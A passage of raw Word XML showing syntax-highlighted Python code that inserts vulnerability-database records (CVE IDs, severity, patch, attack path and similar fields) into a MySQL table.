          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`avd_id`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`vul_severity`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`subject`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`cve_id`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, " </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`utilization`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`patch`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`diclosed_time`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`vul_des`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">," </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`advice`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`references`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`affect_app`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`aliyun_score`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">," </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`attack_path`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`attack_complexity`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`permission`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`affect_scope`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">," </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`exp_maturity`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`data_confidentiality`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`data_integrity`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`server_hazard`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">," </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`quantity_of_whole_network`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>`cwe_id_vul_type`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t xml:space="preserve">) values </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t>(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DB_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=mysql_db, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TABLE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=tableName)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            data = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'avd'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'vul_severity'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'subject'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'cve_id'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'utilization'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'patch'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'diclosed_time'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'vul_des'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'advice'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'references'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'affect_app'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
